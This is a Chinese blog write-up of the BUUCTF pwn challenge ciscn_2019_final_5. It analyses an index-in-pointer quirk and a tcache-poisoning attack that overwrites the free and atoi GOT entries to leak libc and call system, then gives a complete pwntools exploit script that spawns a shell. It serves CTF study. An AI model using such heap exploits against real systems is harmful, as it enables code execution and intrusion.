BUU_ciscn_2019_final_5临界条件处理

于 2023-04-15 16:33:45 发布
阅读量135 收藏
点赞数
分类专栏: 刷题记录 文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_70452545/article/details/130170064
版权

ELF分析

64位、2.27libc
在这里插入图片描述

代码分析

在这里插入图片描述
没有打印地址函数
没有常见溢出、uaf等利用点,这里自己做的时候能想到的只有老2.27版本没有double_free的检测可利用,所以学习了一下其他师傅的wp:
Lynne
L.o.W
这题在存储chunk地址时做了特殊处理:
在这里插入图片描述
将chunk地址与其对应idx进行或运行,且在后续的delete以及edit中对idx的取值是遍历chunk_ptr,找到满足chunk_adr & 0xf == idx 条件的地址
在这里插入图片描述
因为地址最后4位为 0000,所以利用最后四位来存idx似乎没有任何问题,但题目可以让我们取到0x10,即 1 0000,而由于bins的存在,我们malloc申请到的第一块地址会以0x260结尾,即 110 0000,所以在存入chunk_ptr时,进行或运行得到0x270,所以在后续的delete、edit的地址也会+0x10,不过要注意,此时我们输入idx为0才是这块地址
在这里插入图片描述
到这里利用点也就明显了,我们可以先申请idx为0x10的chunk,并输入伪造chunk头,当我们再次申请回来时,便可以实现对临近的chunk写入,2.27的tcache,懂的都懂,修改next指针,任意地址控制。
控制chunk_ptr地址,写入我们需要修改内容的地址,利然后用edit进行修改
因为需要泄露地址,将free_got覆盖为puts_plt
然后将atoi_adr覆盖为system

想法实现

在这里插入图片描述
在实现过程还要注意一些小细节
在这里插入图片描述
free_got、atoi_got的地址是以0x8结尾的,所以一是要区分他们俩,二是用edit修改时,edit会取0x0结尾,所以要多覆盖0x8
顺便说一下有些师傅说的可以控制到size数组,是可以,不过这题没必要,也没必要覆盖size数组

完整EXP

from pwn import *		
context(log_level='debug',os='linux',arch='amd64')
pwnfile = './ciscn_final_5'
io=process(pwnfile)
#io=remote('node4.buuoj.cn',25411)
elf = ELF(pwnfile)
libc = ELF("./libc.so.6")
def debug():
	gdb.attach(io)
	pause()
#NO PIE  Partial RELRO  2.27
def cmd(x):
	io.recvuntil("your choice:")
	io.sendline(str(x))
def add(idx,size,content):
	cmd(1)
	io.recvuntil("index:")
	io.sendline(str(idx))
	io.recvuntil("size:")
	io.sendline(str(size))
	io.recvuntil("content:")
	io.send(content)
def edit(idx,content):
	cmd(3)
	io.recvuntil("index: ")
	io.sendline(str(idx))
	io.recvuntil("content: ")
	io.send(content)
def delete(idx):
	cmd(2)
	io.recvuntil("index: ")
	io.sendline(str(idx))
chunk_ptr = 0x06020E0
free_got = elf.got['free']
puts_got = elf.got['puts']
puts_plt = elf.plt['puts']
atoi_got = elf.got['atoi']
print("free_got-->",hex(free_got))
print("puts_got-->",hex(puts_got))
print("atoi_got-->",hex(atoi_got))

add(16,0x18,p64(0)+p64(0x91))
add(1,0xa0,b'bbbb')
delete(0)  
delete(1)  #提前放入tcache
pay = p64(0)+p64(0x21)+p64(chunk_ptr)
add(2,0x80,pay)  

add(3,0xa0,b'cccc') #提前放入的chunk1
pay = p64(free_got)+p64(atoi_got-7)+p64(puts_got+2)
add(4,0xa0,pay)
#debug()
#free_got,以及atoi_got的地址是以0x8结尾
#但edit会取0x0结尾,所以下需要多写入0x8
edit(8,p64(puts_plt)*2)  
delete(2)
puts_adr = u64(io.recvuntil("\x7f")[-6:].ljust(8,b'\x00'))
libc_base = puts_adr - libc.symbols['puts']
sys_adr = libc_base + libc.symbols['system']
print("libc_base-->",hex(libc_base))
edit(1,p64(sys_adr)*2)

io.recvuntil("your choice:")
io.sendline(b'/bin/sh\x00')
io.interactive()
1uckyc
关注
专栏目录
BUUciscn_2019_c_1
bzduanlei的博客
07-30 274
一、解题思路 0x01 检查文件 开启了NX保护,堆栈不可执行。 0x02 将文件拖入IDA分析 分析主函数,发现get(s)函数存在栈溢出。 0x03 未寻找到system和‘/bin/sh’,需要通过puts函数泄露远端服务器中libc的基址,从而利用远端服务器libc中的system和字符串‘/bin/sh’的地址构造payload。 借助LibcSearcher工具,查找函数在内存中的真正地址。 LibcSearcher安装: git clone https://github.com/liean
[HgameCtf Week2 ]三道堆题总结
qq_42220888的博客
01-20 357
hgame 2023 week2
Ret2libc错误总结
qq_63528163的博客
08-12 355
平时做题目的错误总结
BUU刷题笔记2
SkYe's Blog
09-13 195
#!/usr/bin/python -- coding: utf-8 -- from pwn import * context(log_level = ‘info’, os=‘linux’, arch=‘amd64’) p = process("./note3") p = remote(“node3.buuoj.cn”,25763) elf = ELF("./note3") libc = ELF("/lib/x86_64-linux-gnu/libc.so.6") def add(size,content)
ciscn_2019_final_2
z1r0的博客
02-10 492
ciscn_2019_final_2 查看保护 在delete这里的话有两个uaf。还开了沙盒,说实话一开始真没什么思路,看了一下ha1vk的wp才知道漏了一init里面的一个非常重要的东西 这里读flag。flag的文件描述符被设置成了666 泄露数据的话也不是很多。几个字节 攻击思路:因为是2.27下,double free泄露出堆的低位地址,利用double free将size改为0x91,这个时候可以tcache attack泄露出main_arena的低位。 libc的这些低位都有了之后接
[buuctf]ciscn_2019_ne_5
逆向萌新的博客
11-05 1701
buuctf ciscn_2019_ne_5题目分析
BUU-ciscn_2019_ne_5
qq_45771413的博客
04-27 348
检查保护 IDA 逻辑不是很复杂, 第一次提示输入admin密码,密码要输入administrator才能下一步 接着是输入功能选项(0~3) 第一个输入,看起来没啥用,但是传入的是src字符串,返回的也是src 第二个输出,进去只有一个put,一无所有 第三个是打印,里面发现了system函数 第四个本应该是’0’选项,这里多了个’4’,函数名叫getflag,进去看是个输出flag的函数,初步预测跳转到这里就可以了。 第五个才是’0’的退出 int __cdecl main(int argc,
BUU-ciscn_2019_n_5
qq_45771413的博客
04-27 677
查看保护 什么都没保护.jpg IDA 逻辑很简单,两次输入。这两次输入看起来都可以利用: read限制了读取长度,而且name是全局变量,地址可访问。 gets里的text可以进行栈溢出,0x20 解题思路 EXP from pwn import * p=remote('node3.buuoj.cn',29048) context.arch = 'amd64' # 架构名称,不加狂报错…… context.log_level = 'debug' # debug模式 shellcode = asm(s
ciscn_2019_c_1【BUUCTF】
qq_41696518的博客
08-26 1210
ciscn_2019_c_1【BUUCTF】
BUU ciscn_2019_n_1
xieyichensss的博客
03-19 409
**BUUOJ ciscn_2019_n_1** (今天来晚了,嘿嘿,出去唱歌了,被淋成落汤鸡) 1.老规矩,将其checksec和file一下,发现NX保护被打开了,且是64为的ELF文件。 2.那就放入IDA64内分析,按fn+F5查看c的代码,发现一个func()的函数,双击进入 cat flag直接映入眼帘,我tm直接暗喜,有后门函数了诶,那就不慌了,直接看c的代码。 3.要想将后门函数覆盖到返回地址,那就必须要v2=11.28125,可是又没有v2的gets函数,我们...
ciscn_2019_en_2
m0sway的博客
03-25 1650
ciscn_2019_en_2 WriteUp BUU_PWN
初学pwn-BUUCTF(ciscn_2019_n_1)
天柱的博客
08-31 665
初学pwn-writeUp BUUCTF的第四道题,ciscn-2019_n_1。 首先还是链接远端查看一下。 这里提示让猜一个数字,然后他告诉我们,这个数字应该是11.28125。这就有点掩耳盗铃了呀,但是输入了11.28125,还是在说应该输入11.28125。可能是有点问题,ida打开查看一下。 可以看到主函数里,调用了三个函数,前两个都是set某个值,我们直接看func函数。 那这就很明显了,刚刚输入的值赋给了v1,但是这里是要让v2的值等于11.28125才可以。查看一下地址。 嗯,跟想象
Buu CTF PWN ciscn_2019_c_1 WriteUp
m0sway的博客
03-03 579
Buu CTF PWN题ciscn_2019_c_1的WriteUp
buuctf:ciscn_s_3题解
xia0ji233
05-27 724
title: 系统调用的学习 date: 2021-05-25 22:00:00 tags: binary security study report syscall comments: true categories: ctf pwn today新的知识又增长了,发现了getshell的另一种方式:syscall和srop。故事还要源于…(此处省略万字输出) (note:本作者这次有点懒,没有写AT&T汇编,而是一律用了intel汇编,请悉知) 可能是之前汇编基础不太好吧,竟没有发现sy.
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8509
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
卡通风格化魔法术技能粒子特效 :Toon Projectiles 2 1.0
10-19
这款卡通射击特效资源包提供了 15 种独特的射击物、命中效果和闪光效果,风格统一且易于与您的项目集成。它默认支持 Unity 的内置渲染器,并且兼容 HDRP 和 URP 渲染管线。如果您拥有 Hovl Studio 的其他资源,该包将免费提供。所有效果均在各平台兼容,并且可以通过标准尺寸值轻松调整命中效果的大小。需要注意的是,调整射击物大小时,可能需要修改轨迹长度和按距离生成的速率。 该资源还包含了一个演示场景射击脚本,方便用户快速了解如何使用这些特效。该资源包还与 InfinityPBR 的 Projectile Factory 插件兼容,可以进一步增强您的射击游戏效果。 需要注意的是,推广媒体中使用的后处理效果 "Bloom" 并非资源包自带,建议用户在下载资源包之前,先行从 Unity 包管理器下载 "Post Processing Stack"。HDRP 和 URP 渲染管线的用户可以直接利用内置的 "Volume" 组件中的 "Bloom" 效果。
在 MATLAB GUI 中动态更新数据:策略与实践
10-19
通过本文的详细介绍,你应该能够理解如何在 MATLAB GUI 中更新数据。从设计 GUI 界面到处理用户输入,再到动态更新数据,每一步都是构建交互式 MATLAB 应用程序的关键。通过实际的代码示例,你可以更深入地理解这些概念,并将其应用到你自己的项目中。 记住,GUI 的设计和实现是一个迭代的过程。随着你对用户需求的更深入了解,你可能需要不断调整和优化你的 GUI。通过持续的测试和反馈,你可以创建一个既美观又功能强大的 MATLAB GUI 应用程序
【JCR一区级】Matlab实现白鹭群优化算法ESOA-CNN-BiLSTM-Attention的故障诊断算法研究.rar
最新发布
10-20
1.版本:matlab2014/2019a/2024a 2.附赠案例数据可直接运行matlab程序。 3.代码特点:参数化编程、参数可方便更改、代码编程思路清晰、注释明细。 4.适用对象:计算机,电子信息工程、数学等专业的大学生课程设计、期末大作业和毕业设计。 替换数据可以直接使用,注释清楚,适合新手
信创实验室建设方案(24页).pptx
10-19
信创实验室建设方案(24页)
buu crackrtf
09-26
BUU CrackRTF是一个密码破解题目,其中涉及到了密码的加密和解密过程。在分析代码的过程中,我们可以看到有两个函数sub_40100F和sub_401005。sub_40100F函数是从AAA文件中取出字符和密码进行异或操作,而sub_401005...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值